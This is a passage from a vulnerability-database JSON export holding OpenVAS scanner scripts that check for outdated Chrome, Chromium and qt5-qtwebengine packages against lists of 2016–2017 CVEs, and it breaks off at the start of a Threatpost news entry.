script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:2793-1)\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update to Chromium 54.0.2840.100 fixes the following vulnerabilities:\n\n - CVE-2016-5199: Heap corruption in FFmpeg (boo#1009892)\n\n - CVE-2016-5200: out of bounds memory access in v8 (boo#1009893)\n\n - CVE-2016-5201: info leak in extensions (boo#1009894)\n\n - CVE-2016-5202: various fixes from internal audits (boo#1009895)\");\n\n script_tag(name:\"affected\", value:\"Chromium on openSUSE Leap 42.1, openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:2793-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Chromium'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~54.0.2840.100~140.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~54.0.2840.100~140.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~54.0.2840.100~140.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~54.0.2840.100~140.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~54.0.2840.100~140.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo\", rpm:\"chromium-ffmpegsumo~54.0.2840.100~140.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo-debuginfo\", rpm:\"chromium-ffmpegsumo-debuginfo~54.0.2840.100~140.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-22T16:37:00", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-10-21T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2016-10)-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5183", "CVE-2016-5182", "CVE-2016-5191", "CVE-2016-5186", "CVE-2016-5184", "CVE-2016-5189", "CVE-2016-5194", "CVE-2016-5185", "CVE-2016-5190", "CVE-2016-5181", "CVE-2016-5188"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310809074", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809074", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2016-10)-MAC OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809074\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2016-5181\", \"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5184\",\n \"CVE-2016-5185\", \"CVE-2016-5188\", \"CVE-2016-5189\", \"CVE-2016-5186\",\n \"CVE-2016-5191\", \"CVE-2016-5190\", \"CVE-2016-5194\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-10-21 12:32:32 +0530 (Fri, 21 Oct 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2016-10)-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to\n\n - An universal XSS error in Blink\n\n - A heap overflow error in Blink.\n\n - Multiple use after free errors in PDFium.\n\n - An use after free error in Blink.\n\n - Multiple URL spoofing errors.\n\n - An UI spoofing error.\n\n - A cross-origin bypass error in Blink.\n\n - An out of bounds read error in DevTools.\n\n - An universal XSS error in Bookmarks.\n\n - An use after free error in Internals.\n\n - A scheme bypass error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to bypass security, to execute\n arbitrary script code, to corrupt memory and to conduct spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version\n prior to 54.0.2840.59 on MAC OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 54.0.2840.59 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2016/10/stable-channel-update-for-desktop.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"54.0.2840.59\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"54.0.2840.59\");\n security_message(data:report);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T16:36:09", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-10-21T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2016-10)-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5183", "CVE-2016-5182", "CVE-2016-5191", "CVE-2016-5186", "CVE-2016-5184", "CVE-2016-5189", "CVE-2016-5194", "CVE-2016-5185", "CVE-2016-5190", "CVE-2016-5181", "CVE-2016-5188"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310809073", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809073", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2016-10)-Linux\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809073\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2016-5181\", \"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5184\",\n \"CVE-2016-5185\", \"CVE-2016-5188\", \"CVE-2016-5189\", \"CVE-2016-5186\",\n \"CVE-2016-5191\", \"CVE-2016-5190\", \"CVE-2016-5194\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-10-21 12:32:32 +0530 (Fri, 21 Oct 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2016-10)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to\n\n - An universal XSS error in Blink\n\n - A heap overflow error in Blink.\n\n - Multiple use after free errors in PDFium.\n\n - An use after free error in Blink.\n\n - Multiple URL spoofing errors.\n\n - An UI spoofing error.\n\n - A cross-origin bypass error in Blink.\n\n - An out of bounds read error in DevTools.\n\n - An universal XSS error in Bookmarks.\n\n - An use after free error in Internals.\n\n - A scheme bypass error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to bypass security, to execute\n arbitrary script code, to corrupt memory and to conduct spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version\n prior to 54.0.2840.59 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 54.0.2840.59 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2016/10/stable-channel-update-for-desktop.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"54.0.2840.59\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"54.0.2840.59\");\n security_message(data:report);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T16:36:38", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-10-21T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2016-10)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5183", "CVE-2016-5182", "CVE-2016-5191", "CVE-2016-5186", "CVE-2016-5184", "CVE-2016-5189", "CVE-2016-5194", "CVE-2016-5185", "CVE-2016-5193", "CVE-2016-5190", "CVE-2016-5181", "CVE-2016-5188", "CVE-2016-5192"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310809072", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809072", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2016-10)-Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809072\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2016-5181\", \"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5184\",\n \"CVE-2016-5185\", \"CVE-2016-5188\", \"CVE-2016-5192\", \"CVE-2016-5189\",\n \"CVE-2016-5186\", \"CVE-2016-5191\", \"CVE-2016-5190\", \"CVE-2016-5193\",\n \"CVE-2016-5194\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-10-21 12:32:32 +0530 (Fri, 21 Oct 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2016-10)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to\n\n - An universal XSS error in Blink\n\n - A heap overflow error in Blink.\n\n - Multiple use after free errors in PDFium.\n\n - An use after free error in Blink.\n\n - Multiple URL spoofing errors.\n\n - An UI spoofing error.\n\n - A cross-origin bypass error in Blink.\n\n - An out of bounds read error in DevTools.\n\n - An universal XSS error in Bookmarks.\n\n - An use after free error in Internals.\n\n - A scheme bypass error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to bypass security, to execute\n arbitrary script code, to corrupt memory and to conduct spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version\n prior to 54.0.2840.59 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 54.0.2840.59 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2016/10/stable-channel-update-for-desktop.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"54.0.2840.59\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"54.0.2840.59\");\n security_message(data:report);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:26", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-10-24T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:2597-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5183", "CVE-2016-5182", "CVE-2016-5191", "CVE-2016-5186", "CVE-2016-5184", "CVE-2016-5189", "CVE-2016-5185", "CVE-2016-5193", "CVE-2016-5190", "CVE-2016-5181", "CVE-2016-5188", "CVE-2016-5192", "CVE-2016-5187"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851416", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851416", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851416\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-24 05:53:08 +0200 (Mon, 24 Oct 2016)\");\n script_cve_id(\"CVE-2016-5181\", \"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5184\",\n \"CVE-2016-5185\", \"CVE-2016-5186\", \"CVE-2016-5187\", \"CVE-2016-5188\",\n \"CVE-2016-5189\", \"CVE-2016-5190\", \"CVE-2016-5191\", \"CVE-2016-5192\",\n \"CVE-2016-5193\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:2597-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Chromium'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium was updated to 54.0.2840.59 to fix security issues and bugs.\n\n The following security issues are fixed (bnc#1004465):\n\n - CVE-2016-5181: Universal XSS in Blink\n\n - CVE-2016-5182: Heap overflow in Blink\n\n - CVE-2016-5183: Use after free in PDFium\n\n - CVE-2016-5184: Use after free in PDFium\n\n - CVE-2016-5185: Use after free in Blink\n\n - CVE-2016-5187: URL spoofing\n\n - CVE-2016-5188: UI spoofing\n\n - CVE-2016-5192: Cross-origin bypass in Blink\n\n - CVE-2016-5189: URL spoofing\n\n - CVE-2016-5186: Out of bounds read in DevTools\n\n - CVE-2016-5191: Universal XSS in Bookmarks\n\n - CVE-2016-5190: Use after free in Internals\n\n - CVE-2016-5193: Scheme bypass\n\n The following bugs were fixed:\n\n - bnc#1000019: display issues in full screen mode, add\n\n - -ui-disable-partial-swap to the launcher\n\n The following packaging changes are included:\n\n - The desktop sub-packages are no obsolete\n\n - The package now uses the system variants of some bundled libraries\n\n - The hangouts extension is now built\");\n\n script_tag(name:\"affected\", value:\"Chromium on openSUSE Leap 42.1, openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:2597-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~54.0.2840.59~131.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~54.0.2840.59~131.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~54.0.2840.59~131.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~54.0.2840.59~131.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~54.0.2840.59~131.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo\", rpm:\"chromium-ffmpegsumo~54.0.2840.59~131.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo-debuginfo\", rpm:\"chromium-ffmpegsumo-debuginfo~54.0.2840.59~131.2\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-22T16:28:42", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-07-24T00:00:00", "type": "openvas", "title": "Fedora Update for qt5-qtwebengine FEDORA-2017-98bed96d12", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5023", "CVE-2017-5012", "CVE-2017-5009", "CVE-2016-5224", "CVE-2017-5037", "CVE-2017-5044", "CVE-2016-5225", "CVE-2016-5208", "CVE-2016-5186", "CVE-2016-9651", "CVE-2017-5065", "CVE-2017-5026", "CVE-2016-9652", "CVE-2017-5033", "CVE-2017-5019", "CVE-2016-9650", "CVE-2016-5222", "CVE-2017-5059", "CVE-2016-5205", "CVE-2016-5221", "CVE-2017-5076", "CVE-2017-5017", "CVE-2016-5198", "CVE-2017-5007", "CVE-2016-5171", "CVE-2016-5133", "CVE-2017-5069", "CVE-2017-5050", "CVE-2016-5170", "CVE-2016-5207", "CVE-2017-5025", "CVE-2016-5215", "CVE-2016-5161", "CVE-2017-5071", "CVE-2017-5029", "CVE-2016-5147", "CVE-2017-5024", "CVE-2016-5185", "CVE-2017-5016", "CVE-2017-5046", "CVE-2017-5027", "CVE-2016-5181", "CVE-2017-5015", "CVE-2017-5047", "CVE-2017-5089", "CVE-2017-5010", "CVE-2017-5083", "CVE-2016-5214", "CVE-2017-5008", "CVE-2016-5153", "CVE-2016-5155", "CVE-2017-5067", "CVE-2017-5048", "CVE-2017-5075", "CVE-2017-5049", "CVE-2016-5188", "CVE-2017-5062", "CVE-2016-5192", "CVE-2017-5006", "CVE-2016-5172", "CVE-2017-5061", "CVE-2017-5070", "CVE-2017-5051", "CVE-2016-5187", "CVE-2016-5166", "CVE-2016-5078"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872901", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872901", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_98bed96d12_qt5-qtwebengine_fc24.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for qt5-qtwebengine FEDORA-2017-98bed96d12\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872901\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-24 05:44:15 +0200 (Mon, 24 Jul 2017)\");\n script_cve_id(\"CVE-2016-5133\", \"CVE-2016-5147\", \"CVE-2016-5153\", \"CVE-2016-5155\",\n \"CVE-2016-5161\", \"CVE-2016-5166\", \"CVE-2016-5170\", \"CVE-2016-5171\",\n \"CVE-2016-5172\", \"CVE-2016-5181\", \"CVE-2016-5185\", \"CVE-2016-5186\",\n \"CVE-2016-5187\", \"CVE-2016-5188\", \"CVE-2016-5192\", \"CVE-2016-5198\",\n \"CVE-2016-5205\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5214\",\n \"CVE-2016-5215\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5224\",\n \"CVE-2016-5225\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\",\n \"CVE-2017-5006\", \"CVE-2017-5007\", \"CVE-2017-5008\", \"CVE-2017-5009\",\n \"CVE-2017-5010\", \"CVE-2017-5012\", \"CVE-2017-5015\", \"CVE-2017-5016\",\n \"CVE-2017-5017\", \"CVE-2017-5019\", \"CVE-2017-5023\", \"CVE-2017-5024\",\n \"CVE-2017-5025\", \"CVE-2017-5026\", \"CVE-2017-5027\", \"CVE-2017-5029\",\n \"CVE-2017-5033\", \"CVE-2017-5037\", \"CVE-2017-5044\", \"CVE-2017-5046\",\n \"CVE-2017-5047\", \"CVE-2017-5048\", \"CVE-2017-5049\", \"CVE-2017-5050\",\n \"CVE-2017-5051\", \"CVE-2017-5059\", \"CVE-2017-5061\", \"CVE-2017-5062\",\n \"CVE-2017-5065\", \"CVE-2017-5067\", \"CVE-2017-5069\", \"CVE-2017-5070\",\n \"CVE-2017-5071\", \"CVE-2017-5075\", \"CVE-2017-5076\", \"CVE-2016-5078\",\n \"CVE-2017-5083\", \"CVE-2017-5089\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for qt5-qtwebengine FEDORA-2017-98bed96d12\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'qt5-qtwebengine'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"qt5-qtwebengine on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-98bed96d12\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LV2U7SINGF3SBK7HVKSWFOYLQBUH6PUE\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"qt5-qtwebengine\", rpm:\"qt5-qtwebengine~5.6.3~0.1.20170712gitee719ad313e564.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:23", "description": "Google is urging Windows, Mac and Linux users to update their Chrome browsers to fix multiple vulnerabilities that could allow malicious third parties to take control of targeted systems.\n\nReleased Thursday, Chrome version 55.0.2883.75 for 